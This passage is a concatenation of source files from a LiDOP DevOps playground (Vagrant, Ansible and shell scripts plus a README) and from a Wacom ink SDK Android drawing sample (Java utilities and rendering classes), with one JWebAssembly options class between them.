FileUtils.cp("#{File.dirname(__FILE__)}/templates/lidop_config.yaml", config_file) end 
config_file="#{File.dirname(__FILE__)}/.vagrant_config.yaml" if(File.exist?(config_file)) else FileUtils.cp("#{File.dirname(__FILE__)}/templates/vagrant_config.yaml", config_file) end # init new settins (user and password question) settings = Settings.new # load the configuration out of *.config.yaml configuration = settings.readConfig # ask for username and password if ARGV.include? "up" or ARGV.include? "provision" if(File.exist?(".env")) File.open('.env').each do |line| puts "Set #{line.split('=')[0]} to #{line.split('=')[1]}" ENV[line.split('=')[0].strip] = line.split('=')[1].strip end end settings.init() end # start vagrant part Vagrant.configure("2") do |config| # if a extend script is defined, copy the file to remote machine if "#{ENV['LIDOP_EXTEND']}" != "" config.vm.provision "file", source: ENV['LIDOP_EXTEND'], destination: "/vagrant/extensions/extend.yml" end # define default installation script ansible_script = <<-SCRIPT export ANSIBLE_CONFIG=/vagrant/install/ansible.cfg export LIDOP_EXTEND=#{ENV['LIDOP_EXTEND_NEW']} export ANSIBLE_VAULT_PASSWORD=<PASSWORD> dos2unix /vagrant/install/vault-env chmod +x /vagrant/install/vault-env ansible-playbook /vagrant/install/install.yml --vault-password-file /vagrant/install/vault-env -e ' root_password=#{settings.<PASSWORD>} root_user=#{settings.user_name} SCRIPT # define default test script test_script = <<-SCRIPT docker run --rm \ -v /vagrant/tests/:/serverspec \ -v /var/lidop/www/tests/:/var/lidop/www/tests/ \ -e USERNAME=#{settings.user_name} \ -e PASSWORD=#{<PASSWORD>} \ -e HOST=$IPADDRESS \ -e HOSTNAME=$HOSTNAME \ -e TEST_HOST=$TEST_HOST \ registry.service.lidop.local:5000/lidop/serverspec:#{configuration["docker_image_version"]} test SCRIPT # no parallel start of the machines ENV['VAGRANT_NO_PARALLEL'] = 'yes' # read the number of workers and loop workers = configuration["nodes"] (0..workers).each do |worker| # set the name of the vagrant machine config.vm.define "lidop_#{worker}" do |machine_config| # set 
the hostname machine_config.vm.hostname = "LiDOP#{worker}" # common scripts if configuration["install_mode"]== "online" machine_config.vm.provision "shell", path: "./scripts/ansible.sh" end # script for virtualbox machine_config.vm.provider :virtualbox do |v, override| Virtualbox.init(v, override, worker, settings, configuration, ansible_script, test_script) if(worker == workers) override.vm.provision "show_info", type: "show_info" end end end end end<file_sep># LiDOP A easy to use DevOps playground. Can be started local or in AWS. ## Getting Started These instructions will get you a copy of the project up and running on your local machine for development and testing purposes [Installation](./install/Readme.md) ## High Level Architecture | Layer | Tools | Description | ------------------------- | ------------------- | ---------------------- | `Plugins` | Code | Example code and pipelines | `Test installation` | Serverspec | Test Installation | `Provisioning` | Ansible | Install LiDOP | `Infrastructure option 1` | AWS Cloud Formation | For starting LiDOP in AWS | `Infrastructure option 2` | Terraform | For starting LiDOP in cloud (AWS) | `Infrastructure option 3` | Vagrant | For starting LiDOP on a local machine # Special note for the Vagrant way ## Prerequisites The following Software must be installed to run LiDOP - Virtualbox https://www.virtualbox.org/wiki/Downloads - Vagrant https://www.vagrantup.com/downloads.html ## Starting *On a windows machine, use cmd or powershell and not git bash for executing vagrant up* ``` git clone https://github.com/LivingDevOps/LiDOP.git cd lidop vagrant up ``` # Infrastructure general The default and testet infrastrucutre OS, is a Ubuntu 16.10. 
The following changes will be executed during the ansible execution (be care full, if you run the ansible-playbook on a existing machine) ## Prerequisites One Jenkins Slave is installed on the host machine, therefore we change the ssh settings on the host machine: - enable login with user and password ## Software The following software will be installed during the ansible execution: - nfs-kernel-server - java jre (for jenkins slave) - python-pip - python-pexpect - dos2unix ## Network The DNS settings will be changed. There is a Consul service running which will be the default DNS resolver for the host. # Provisioning The installation is done with Ansible (99% of it). There is one script, which will install ansible on the host machine (yes we execute ansible direct on the host). ## High Level process 1. Execution of ./scripts/ansible.sh. This script installs Ansible and needed ansible modules. 2. Execution of the ansible playbook ./install/install.yml - Ansible Role "lidop_host_preparation". Installation and configuration of the host - Ansible Role "docker". Installation and configuration of docker - Ansible Role "lidop". Installation and configuration of LiDOP # Test installation The most of the ansible steps are testet after each step. 
Never the less, there are some server spec tests which will be executed at the end of the installation ## Plugins description is coming soon<file_sep>require 'net/http' require "open3" module LocalCommand class Config < Vagrant.plugin("2", :config) attr_accessor :message end class Plugin < Vagrant.plugin("2") name "show_info" config(:show_info, :provisioner) do Config end provisioner(:show_info) do Provisioner end end class Provisioner < Vagrant.plugin("2", :provisioner) def provision base_url, s1 = Open3.capture2 "vagrant ssh lidop_0 -c 'echo $(curl --silent consul.service.lidop.local:8500/v1/kv/config/base_url?raw)'" secret_password, s2 = Open3.capture2 "vagrant ssh lidop_0 -c 'echo $(curl --silent consul.service.lidop.local:8500/v1/kv/config/secret_password?raw)'" root_user, s2 = Open3.capture2 "vagrant ssh lidop_0 -c 'echo $(curl --silent consul.service.lidop.local:8500/v1/kv/config/root_user?raw)'" print("\n#############################################################\n" \ "LiDOP ist ready to use. \n" \ "#############################################################\n" \ "Access under: #{base_url}" \ "User: #{root_user}" \ "Password: the <PASSWORD> you entered on startup\n" \ "Secret Password: #{<PASSWORD>_<PASSWORD>}" \ "#############################################################\n" ) end end end<file_sep>#!/bin/bash echo $ANSIBLE_VAULT_PASSWORD<file_sep>#!/usr/bin/env bash echo "###########################################################" echo "Install ansible" echo "###########################################################" sudo apt-get update sudo apt-get install -y software-properties-common sudo apt-add-repository -y ppa:ansible/ansible sudo apt-get update sudo apt-get install -y \ ansible \ python-pip \ python-pexpect \ dos2unix echo "###########################################################" ansible --version echo "###########################################################"
2399b7520c2e3959d3c49411ce247f21cfd338d7
[ "Markdown", "Ruby", "Shell" ]
6
Ruby
thiyagsdevops/devops
da5358cefd74a4e9481a4f3126c82b62bd29f48d
ab03766f50af6227adfe6ce612aefeebd9bb873f
refs/heads/master
<repo_name>azhouSummer/JWebAssembly<file_sep>/src/de/inetsoftware/jwebassembly/wasm/WasmOptions.java /* * Copyright 2017 - 2019 <NAME> (i-net software) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package de.inetsoftware.jwebassembly.wasm; import java.util.HashMap; import de.inetsoftware.jwebassembly.JWebAssembly; import de.inetsoftware.jwebassembly.module.FunctionName; /** * The option/properties for the behavior of the compiler. * * @author <NAME> */ public class WasmOptions { private final boolean debugNames; private final boolean useGC; /** * NonGC function for ref_eq polyfill. */ public FunctionName ref_eq; /** * Create a new instance of options * * @param properties * compiler properties */ public WasmOptions( HashMap<String, String> properties ) { debugNames = Boolean.parseBoolean( properties.get( JWebAssembly.DEBUG_NAMES ) ); useGC = Boolean.parseBoolean( properties.getOrDefault( JWebAssembly.WASM_USE_GC, "false" ) ); } /** * Property for adding debug names to the output if true. * * @return true, add debug information */ public boolean debugNames() { return debugNames; } /** * If the GC feature of WASM should be use or the GC of the JavaScript host. * * @return true, use the GC instructions of WASM. */ public boolean useGC() { return useGC; } }
2109183fa727b486cb87c77af75e1050b4f3e105
[ "Java" ]
1
Java
azhouSummer/JWebAssembly
aba8052de099fb4fb948479b2b5268b5d99580fd
5bbf3c4066f3a0d8a0979b24d3191a91bcbaaf3e
refs/heads/master
<file_sep>/* * Created by <NAME>. * Copyright (c) 2013 Wacom. All rights reserved. */ package com.wacom.ink.utils; import java.io.IOException; import java.io.InputStream; import javax.microedition.khronos.egl.EGL10; import javax.microedition.khronos.egl.EGLContext; import android.content.Context; import android.graphics.Bitmap; import android.graphics.BitmapFactory; import android.opengl.GLES20; import android.opengl.GLUtils; /** * OpenGl utility class. * */ public class OpenGLUtils{ public static Logger logger = new Logger(OpenGLUtils.class); /** * Constant: no OpenGl texture */ public static int NO_TEXTURE_ID = 0; /** * Creates an OpenGl texture, filling it with the given bitmap's pixels. * @param bitmap a bitmap object * @param sampleMode a value to be used as {@link GLES20#GL_TEXTURE_MIN_FILTER} and {@link GLES20#GL_TEXTURE_MAG_FILTER} texture parameter * @param wrapMode a value to be used as {@link GLES20#GL_TEXTURE_WRAP_S} and {@link GLES20#GL_TEXTURE_WRAP_T} texture parameter * @return id of the allocated OpenGl texture */ public static int bitmapToOpenGL(Bitmap bitmap, int sampleMode, int wrapMode){ return bitmapToOpenGL(bitmap, NO_TEXTURE_ID, sampleMode, wrapMode); } public static int generateTexture(boolean bBindTexture){ return generateTexture(NO_TEXTURE_ID, bBindTexture); } public static int generateTexture(int textureId, boolean bBindTexture){ int textures[] = new int[1]; if (textureId==NO_TEXTURE_ID){ GLES20.glGenTextures(1, textures, 0); textureId = textures[0]; } GLES20.glBindTexture(GLES20.GL_TEXTURE_2D, textureId); return textureId; } /** * Creates or overwrites an OpenGl texture, filling it with the given bitmap's pixels. * @param bitmap a bitmap object * @param textureId OpenGl texture id. If this value equals {@link #NO_TEXTURE_ID}, a new OpenGl texture will be created. 
* @param sampleMode a value to be used as {@link GLES20#GL_TEXTURE_MIN_FILTER} and {@link GLES20#GL_TEXTURE_MAG_FILTER} texture parameter * @param wrapMode a value to be used as {@link GLES20#GL_TEXTURE_WRAP_S} and {@link GLES20#GL_TEXTURE_WRAP_T} texture parameter * @return OpengGl texture id */ public static int bitmapToOpenGL(Bitmap bitmap, int textureId, int sampleMode, int wrapMode){ int textures[] = new int[1]; if (textureId==NO_TEXTURE_ID){ GLES20.glGenTextures(1, textures, 0); textureId = textures[0]; } GLES20.glBindTexture(GLES20.GL_TEXTURE_2D, textureId); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_WRAP_S, wrapMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_WRAP_T, wrapMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_MAG_FILTER, sampleMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_MIN_FILTER, sampleMode); if (Logger.LOG_ENABLED) logger.i("bitmapToOpenGL: " + bitmap.getWidth() + "," + bitmap.getHeight() + " | " + wrapMode + "," + sampleMode); GLUtils.texImage2D(GLES20.GL_TEXTURE_2D, 0, bitmap, 0); if (GLES20.glGetError()>0){ Utils.alertAndAssert("bitmapToOpenGL failed!"); } return textureId; } /** * Loads a bitmap from the given filename and location into the provided OpenGl texture and generates mipmaps for it. * This method searches for additional image files in the provided location folder for the different mipmap levels. * For example: if the filename is image.png, the method will look for a image_i.png file for the i-th mipmap level. * @param context An Android context. * @param filename The image filename. * @param location The folder, where the image is located. If location is null, the method expects the file to be located in the assets folder of the application. * @param textureId A value to be used as {@link GLES20#GL_TEXTURE_MIN_FILTER} and {@link GLES20#GL_TEXTURE_MAG_FILTER} texture parameter. 
* @param sampleMode A value to be used as {@link GLES20#GL_TEXTURE_MIN_FILTER} and {@link GLES20#GL_TEXTURE_MAG_FILTER} texture parameter. * @param wrapMode A value to be used as {@link GLES20#GL_TEXTURE_WRAP_S} and {@link GLES20#GL_TEXTURE_WRAP_T} texture parameter. * @return OpengGl texture id. */ public static boolean generateMipmaps(Context context, String filename, String location, int textureId, int sampleMode, int wrapMode) { InputStream is = null; String res[] = Utils.splitFilenameAndExt(filename); int errCode; if (res==null){ //can't split filename, that's odd return false; } String fn = res[0]; String ext = res[1]; if (Logger.LOG_ENABLED) logger.i("generateMipmaps / bind texture " + textureId); GLES20.glBindTexture(GLES20.GL_TEXTURE_2D, textureId); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_WRAP_S, wrapMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_WRAP_T, wrapMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_MAG_FILTER, sampleMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_MIN_FILTER, GLES20.GL_LINEAR_MIPMAP_LINEAR); Bitmap bitmap = null; Bitmap baseBitmap = null; boolean bMipmapping = true; int level = 0; int size = 0; while (bMipmapping) { String f = null; try { if (level==0){ f = filename; } else { f = fn + "_" + level + "." 
+ ext; } // is = context.getAssets().open(f); is = Utils.openFile(context, f, location); bitmap = BitmapFactory.decodeStream(is); if (bitmap != null) { baseBitmap = bitmap; size = baseBitmap.getWidth(); } } catch (IOException e) { if (Logger.LOG_ENABLED) logger.i("generateMipmaps / error opening asset " + f); bitmap = null; } finally { try { is.close(); } catch (Exception e) { } } if (bitmap==null){ size = size / 2; if (Logger.LOG_ENABLED) logger.i("generateMipmaps / no bitmap allocated for " + filename + ", level=" + level + "; downscaling initial bitmap to " + size + "x" + size); bitmap = Bitmap.createScaledBitmap(baseBitmap, size, size, true); if (bitmap==baseBitmap){ //if this ever happens, it seems like android sdk bug (1); maybe we should throw an exception here if (Logger.LOG_ENABLED) logger.i("generateMipmaps / if this ever happens, it seems like android sdk bug (1); maybe we should throw an exception here"); return false; } if (bitmap==null){ //if this ever happens, it seems like android sdk bug (2); maybe we should throw an exception here if (Logger.LOG_ENABLED) logger.i("generateMipmaps / if this ever happens, it seems like android sdk bug (2); maybe we should throw an exception here"); return false; } } if (Logger.LOG_ENABLED) logger.i("generateMipmaps / texImage2D => fn=" + filename + " level=" + level + " / size=" + bitmap.getWidth() + "x" + bitmap.getHeight()); GLUtils.texImage2D(GLES20.GL_TEXTURE_2D, level, bitmap, 0); errCode = GLES20.glGetError(); if (errCode!=GLES20.GL_NO_ERROR){ if (Logger.LOG_ENABLED) logger.e("generateMipmaps / ERROR " + errCode+ " with texImage2D => fn=" + filename + " level=" + level); } if (level>0){ bitmap = Utils.recycleBitmap(bitmap); } level++; bMipmapping = size>1; } Utils.recycleBitmap(baseBitmap); return true; } public static void checkError(String errorMessageOpt){ EGL10 egl = (EGL10)EGLContext.getEGL(); int e = GLES20.glGetError(); if (e!=GLES20.GL_NO_ERROR){ if (Logger.LOG_ENABLED) logger.e("OpenGL error" + 
(errorMessageOpt!=null?(" ("+errorMessageOpt+")"):"") + ": " + e); } e = egl.eglGetError(); if (e!=EGL10.EGL_SUCCESS){ if (Logger.LOG_ENABLED) logger.e("EGL error" + (errorMessageOpt!=null?(" ("+errorMessageOpt+")"):"") + ": " + e); } } public static String getGPUInfo(){ String info = ""; info += "GPUINFO <start>"; info += "GPUINFO | vendor: " + GLES20.glGetString(GLES20.GL_VENDOR) + "\n"; info += "GPUINFO | renderer: " + GLES20.glGetString(GLES20.GL_RENDERER) + "\n"; info += "GPUINFO | verison: " + GLES20.glGetString(GLES20.GL_VERSION) + "\n"; info += "GPUINFO | extensions: " + GLES20.glGetString(GLES20.GL_EXTENSIONS) + "\n"; info += "GPUINFO <end>"; return info; } public static int getFramebufferBinding(){ // glGetIntegerv(GL_FRAMEBUFFER_BINDING, &defaultFBO); int params[] = new int[1]; GLES20.glGetIntegerv(GLES20.GL_FRAMEBUFFER_BINDING, params, 0); //return params[0]; return 0; } }<file_sep>package com.wacom.ink.utils; public class SharedResource<T> { private T resource; private Owner<T> owner; public SharedResource(T resource){ this.resource = resource; } public void set(T resource){ this.resource = resource; } public T aquire(SharedResource.Owner<T> owner){ if (this.owner!=null && this.owner!=owner){ this.owner.release(resource); } this.owner = owner; // owner.onAquired(); return resource; } // public void release(){ // if (owner!=null){ // owner.release(); // } // } public void release() { if (owner!=null){ owner.release(resource); owner = null; } } public static interface Owner<T>{ void release(T resource); // void onAquired(); } public boolean hasOwner() { return owner!=null; } } <file_sep>package com.wacom.ink.utils; import java.io.IOException; import java.io.InputStream; public class BitUtils { public static boolean compare(byte[] arr1, byte[] arr2){ if (arr1==null || arr2==null){ return false; } else if (arr1.length!=arr2.length){ return false; } else { for (int i=0;i<arr1.length;i++){ if (arr1[i]!=arr2[i]){ return false; } } } return true; } public 
static int uint32LittleEndian(int value) { value = (int)((long)value & 0xFFFFFFFF); return swapBytes(value); } public static short swapBytes(short value) { int b1 = value & 0xff; int b2 = (value >> 8) & 0xff; return (short) (b1 << 8 | b2 << 0); } public static int swapBytes(int value) { int b1 = (value >> 0) & 0xff; int b2 = (value >> 8) & 0xff; int b3 = (value >> 16) & 0xff; int b4 = (value >> 24) & 0xff; return b1 << 24 | b2 << 16 | b3 << 8 | b4 << 0; } public static long swapBytes(long value) { long b1 = (value >> 0) & 0xff; long b2 = (value >> 8) & 0xff; long b3 = (value >> 16) & 0xff; long b4 = (value >> 24) & 0xff; long b5 = (value >> 32) & 0xff; long b6 = (value >> 40) & 0xff; long b7 = (value >> 48) & 0xff; long b8 = (value >> 56) & 0xff; return b1 << 56 | b2 << 48 | b3 << 40 | b4 << 32 | b5 << 24 | b6 << 16 | b7 << 8 | b8 << 0; } public static boolean findBytePattern(byte[] pattern, InputStream in) throws IOException { int read = -1; int index = 0; do { if (index == pattern.length) { return true; } read = in.read(); if (read == pattern[index]) { index++; } else { index = 0; } } while(read != -1); return false; } } <file_sep>package com.wacom.ink.utils; import java.io.IOException; import java.io.OutputStream; import java.nio.ByteBuffer; public class ByteBufferOutputStream extends OutputStream { private ByteBuffer buffer; public ByteBufferOutputStream(ByteBuffer byteBuffer) throws IOException { if (byteBuffer == null) throw new IOException("Invalid ByteBuffer"); this.buffer = byteBuffer; } @Override public void write(int oneByte) throws IOException { buffer.put((byte) oneByte); } @Override public void write(byte[] buffer, int offset, int count) throws IOException { this.buffer.put(buffer, offset, count); } }<file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.rasterization; /** * Blend modes enumeration. */ public enum BlendMode { /** * Normal blending. 
*/ BLENDMODE_NORMAL((byte)0), /** * Reverse blending. */ BLENDMODE_NORMAL_REVERSE((byte)1), /** * "Zero" blending (erase). */ BLENDMODE_ERASE((byte)2), /** * No blending (overwrite). */ BLENDMODE_NONE((byte)3), /** * Max blending. */ BLENDMODE_MAX((byte)4), /** * Min blending. */ BLENDMODE_MIN((byte)5), /** * Multiply blending. Multiplies alpha and color components. */ BLENDMODE_MULTIPLY((byte)6), BLENDMODE_ADD((byte)7), BLENDMODE_SUBSTRACT((byte)8), BLENDMODE_SUBSTRACT_REVERSE((byte)9), /** * Multiply blending. Multiplies only color components. */ BLENDMODE_MULTIPLY_NO_ALPHA((byte)10), BLENDMODE_MULTIPLY_NO_ALPHA_INVERT((byte)11); byte value; BlendMode(byte value){ this.value = value; } public byte getValue(){ return value; } @Override public String toString() { BlendMode blend = this; if (blend==BLENDMODE_NORMAL){ return STR_BLENDMODE_NORMAL; } else if (blend==BLENDMODE_NORMAL_REVERSE){ return STR_BLENDMODE_NORMAL_REVERSE; } else if (blend==BLENDMODE_ERASE){ return STR_BLENDMODE_ERASE; } else if (blend==BLENDMODE_MAX){ return STR_BLENDMODE_MAX; } else if (blend==BLENDMODE_MIN){ return STR_BLENDMODE_MIN; } else if (blend==BLENDMODE_MULTIPLY){ return STR_BLENDMODE_MULTIPLY; } else if (blend==BLENDMODE_ADD){ return STR_BLENDMODE_ADD; } else if (blend==BLENDMODE_SUBSTRACT){ return STR_BLENDMODE_SUBSTRACT; } else if (blend==BLENDMODE_SUBSTRACT_REVERSE){ return STR_BLENDMODE_SUBSTRACT_REVERSE; } else if (blend==BLENDMODE_MULTIPLY_NO_ALPHA){ return STR_BLENDMODE_MULTIPLY_NO_ALPHA; } else if (blend==BLENDMODE_MULTIPLY_NO_ALPHA_INVERT){ return STR_BLENDMODE_MULTIPLY_NO_ALPHA_INVERT; } return STR_BLENDMODE_NONE; } public static final String STR_BLENDMODE_NORMAL = "NORMAL"; public static final String STR_BLENDMODE_NORMAL_REVERSE = "NORMAL_REVERSE"; public static final String STR_BLENDMODE_ERASE = "ERASE"; public static final String STR_BLENDMODE_NONE = "NONE"; public static final String STR_BLENDMODE_MAX = "MAX"; public static final String STR_BLENDMODE_MIN = "MIN"; public 
static final String STR_BLENDMODE_MULTIPLY = "MULTIPLY"; public static final String STR_BLENDMODE_ADD = "ADD"; public static final String STR_BLENDMODE_SUBSTRACT = "SUBSTRACT"; public static final String STR_BLENDMODE_SUBSTRACT_REVERSE = "SUBSTRACT_REVERSE"; public static final String STR_BLENDMODE_MULTIPLY_NO_ALPHA = "MULTIPLY_NO_ALPHA"; public static final String STR_BLENDMODE_MULTIPLY_NO_ALPHA_INVERT = "MULTIPLY_NO_ALPHA_INVERT"; public static BlendMode getFromString(String blendModeAsString){ if (blendModeAsString.equals("NORMAL")) { return BLENDMODE_NORMAL; } else if (blendModeAsString.equals("NORMAL_REVERSE")) { return BLENDMODE_NORMAL_REVERSE; } else if (blendModeAsString.equals("ERASE")) { return BLENDMODE_ERASE; } else if (blendModeAsString.equals("MAX")) { return BLENDMODE_MAX; } else if (blendModeAsString.equals("MIN")) { return BLENDMODE_MIN; } else if (blendModeAsString.equals("MULTIPLY")) { return BLENDMODE_MULTIPLY; } return BLENDMODE_NONE; } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. 
*/ package com.wacom.ink.geometry; public class WRect { /** * @hide */ public long handle; private native long nativeInitialize(); private native void nativeFinalize(long handle); private native float nativeGetX(long handle); private native float nativeGetY(long handle); private native float nativeGetW(long handle); private native float nativeGetH(long handle); private native void nativeSetX(long handle, float value); private native void nativeSetY(long handle, float value); private native void nativeSetW(long handle, float value); private native void nativeSetH(long handle, float value); public WRect() { this(Float.NaN, Float.NaN, Float.NaN, Float.NaN); } public WRect(float w, float h){ this(0, 0, w, h); } public WRect(WRect rect) { handle = nativeInitialize(); set(rect); } public WRect(float x, float y, float w, float h) { handle = nativeInitialize(); set(x, y, w, h); } public float getX(){ return nativeGetX(handle); } public float getY(){ return nativeGetY(handle); } public float getWidth(){ return nativeGetW(handle); } public float getHeight(){ return nativeGetH(handle); } public void setX(float value){ nativeSetX(handle, value); } public void setY(float value){ nativeSetY(handle, value); } public void setWidth(float value){ nativeSetW(handle, value); } public void setHeight(float value){ nativeSetH(handle, value); } public boolean isNaN(){ return Float.isNaN(getX()) || Float.isNaN(getY()) || Float.isNaN(getWidth()) || Float.isNaN(getHeight()); } public void setNaN(){ set(Float.NaN, Float.NaN, Float.NaN, Float.NaN); } public void copy(WRect rect){ set(rect.getX(), rect.getY(), rect.getWidth(), rect.getHeight()); } public void union(WRect rect){ if (isNaN()){ if (!rect.isNaN()){ set(rect.getX(), rect.getY(), rect.getWidth(), rect.getHeight()); } return; } if (rect.isNaN()){ return; } float nx1 = Math.min(getX(), rect.getX()); float ny1 = Math.min(getY(), rect.getY()); float nx2 = Math.max(getX()+getWidth(), rect.getX()+rect.getWidth()); float ny2 = 
Math.max(getY()+getHeight(), rect.getY()+rect.getHeight()); set(nx1, ny1, nx2-nx1, ny2-ny1); } public boolean intersect(WRect rect) { if (rect.isNaN()) { setNaN(); return true; } return intersect(rect.getX(), rect.getY(), rect.getWidth(), rect.getHeight()); } public boolean intersect(float x, float y, float width, float height) { if (!isNaN()){ float[] curr = new float[]{getX(), getY(), getWidth(), getHeight()}; if (curr[0] < x + width && x < curr[0] + curr[2] && curr[1] < y + height && y < curr[1] + curr[3]) { float nx1 = Math.max(curr[0], x); float ny1 = Math.max(curr[1], y); float nx2 = Math.min(curr[0] + curr[2], x + width); float ny2 = Math.min(curr[1] + curr[3], y + height); set(nx1, ny1, nx2-nx1, ny2-ny1); return true; } } return false; } public void roundOut() { float nx = (float) Math.floor(getX()); float ny = (float) Math.floor(getY()); float nw = (float) Math.ceil(getWidth()); float nh = (float) Math.ceil(getHeight()); set(nx, ny, nw, nh); } public void set(WRect rect) { set(rect.getX(), rect.getY(), rect.getWidth(), rect.getHeight()); } public void set(float x, float y, float w, float h){ setX(x); setY(y); setWidth(w); setHeight(h); } @Override public String toString() { return "[" + getX() + "," + getY() + "; " + getWidth() + "," + getHeight() + "]"; } @Override protected void finalize() throws Throwable { super.finalize(); nativeFinalize(handle); } static { System.loadLibrary("InkingEngine"); } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.utils; import android.content.Intent; import android.util.SparseArray; /** * A simple Android Intent manager. This class is designed to work with IntentResponseHandler implementations. 
* */ public class IntentManager{ private SparseArray<IntentResponseHandler> handlers; public IntentManager(){ handlers = new SparseArray<IntentResponseHandler>(); } public IntentResponseHandler getIntentResponseHandler(int requestCode){ return handlers.get(requestCode); } public void addIntentResponseHandler(int requestCode, IntentResponseHandler handler){ handlers.put(requestCode, handler); } public boolean processIntentResponse(int requestCode, int resultCode, Intent data){ IntentResponseHandler handler = getIntentResponseHandler(requestCode); if (handler!=null){ return handler.handleResponse(resultCode, data); } return false; } }<file_sep>/** * Group of classes designed implementing data smoothing (Smoothing module) */ package com.wacom.ink.smooth; <file_sep>package com.wacom.ink.samples.drawwithtouch; import java.nio.FloatBuffer; import com.pinaround.R; import android.app.Activity; import android.graphics.Color; import android.os.Bundle; import android.view.MotionEvent; import android.view.SurfaceHolder; import android.view.SurfaceView; import android.view.View; import android.view.View.OnTouchListener; import android.widget.Button; import com.wacom.ink.geometry.WRect; import com.wacom.ink.path.PathBuilder.PropertyFunction; import com.wacom.ink.path.PathBuilder.PropertyName; import com.wacom.ink.path.SpeedPathBuilder; import com.wacom.ink.rasterization.BlendMode; import com.wacom.ink.rasterization.InkCanvas; import com.wacom.ink.rasterization.Layer; import com.wacom.ink.rasterization.ParticleBrush; import com.wacom.ink.rasterization.SolidColorBrush; import com.wacom.ink.rasterization.StrokeJoin; import com.wacom.ink.rasterization.StrokePaint; import com.wacom.ink.rendering.RenderingContext; import com.wacom.ink.smooth.MultiChannelSmoothener; import com.wacom.ink.smooth.MultiChannelSmoothener.SmoothingResult; import com.wacom.ink.utils.TouchUtils; public class DrawWithTouchPart05 extends Activity { private RenderingContext renderingContext; private InkCanvas 
inkCanvas; private Layer viewLayer; private SpeedPathBuilder pathBuilder; private StrokePaint paint; private StrokePaint prelimPaint; private SolidColorBrush brush; private StrokeJoin strokeJoin; private StrokeJoin prelimJoin; private Layer strokesLayer; private Layer strokesWithPreliminaryLayer; private MultiChannelSmoothener smoothener; private int pathStride; private WRect prevPrelimArea = new WRect(); private WRect dirtyArea = new WRect(); public void changeColor(View v) { paint.setColor(Color.RED); } @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_draw_with_touch); /*Button btnColore = (Button) findViewById(R.id.btnColore); btnColore.setOnClickListener ( new OnClickListener() { @Override public void onClick(View v) { } } );*/ SurfaceView surfaceView = (SurfaceView) findViewById(R.id.surfaceview); surfaceView.getHolder().addCallback(new SurfaceHolder.Callback(){ @Override public void surfaceChanged(SurfaceHolder holder, int format, int width, int height) { renderingContext = new RenderingContext(new RenderingContext.EGLConfigSpecification()); renderingContext.initContext(); renderingContext.createEGLSurface(holder); renderingContext.bindEGLContext(); inkCanvas = new InkCanvas(); inkCanvas.setDimensions(width, height); inkCanvas.glInit(); viewLayer = new Layer(); // Initialize the view layer with the dimensions of the surface, with scale factor 1.0 and // bind it to the default framebuffer, the OpenGL context was created with. 
viewLayer.initWithFramebuffer(inkCanvas, width, height, 1.0f, 0); viewLayer.setFlipY(true); strokesLayer = new Layer(); strokesLayer.init(inkCanvas, width, height, 1.0f, true); strokesWithPreliminaryLayer = new Layer(); strokesWithPreliminaryLayer.init(inkCanvas, width, height, 1.0f, true); pathBuilder = new SpeedPathBuilder(getResources().getDisplayMetrics().density); pathBuilder.setNormalizationConfig(500.0f, 4000.0f); pathBuilder.setMovementThreshold(2.0f); pathBuilder.setPropertyConfig(PropertyName.Width, 6f, 12f, 6f, 12f, PropertyFunction.Power, 1.0f, false); pathBuilder.setPropertyConfig(PropertyName.Alpha, 0.05f, 0.4f, 0.05f, 0.4f, PropertyFunction.Power, 1.0f, false); pathStride = pathBuilder.getStride(); /*brush = new ParticleBrush(true); brush.setBlendMode(BlendMode.BLENDMODE_NORMAL); brush.setFillTextureFilename("fill.png"); brush.setShapeTextureFilename("shape.png"); brush.setScattering(0.15f); brush.setSpacing(0.15f); brush.setRotateRandom(true); brush.setRotateAlongTrajectory(false); brush.allocateTextures(DrawWithTouchPart05.this);*/ brush = new SolidColorBrush(); paint = new StrokePaint(); paint.setStrokeBrush(brush); // Particle brush. paint.setColor(Color.BLUE); // Blue color. paint.setWidth(Float.NaN); // Expected variable width. paint.setAlpha(Float.NaN); // Expected variable alpha. prelimPaint = new StrokePaint(); strokeJoin = new StrokeJoin(); prelimJoin = new StrokeJoin(); smoothener = new MultiChannelSmoothener(pathStride); smoothener.enableChannel(2); smoothener.enableChannel(3); renderView(); } @Override public void surfaceCreated(SurfaceHolder holder) { } @Override public void surfaceDestroyed(SurfaceHolder holder) { } }); surfaceView.setOnTouchListener(new OnTouchListener() { @Override public boolean onTouch(View v, MotionEvent event) { buildPath(event); drawStroke(event); renderView(); return true; } }); } private void renderView() { inkCanvas.setTarget(viewLayer); // Clear the view and fills it with white color. 
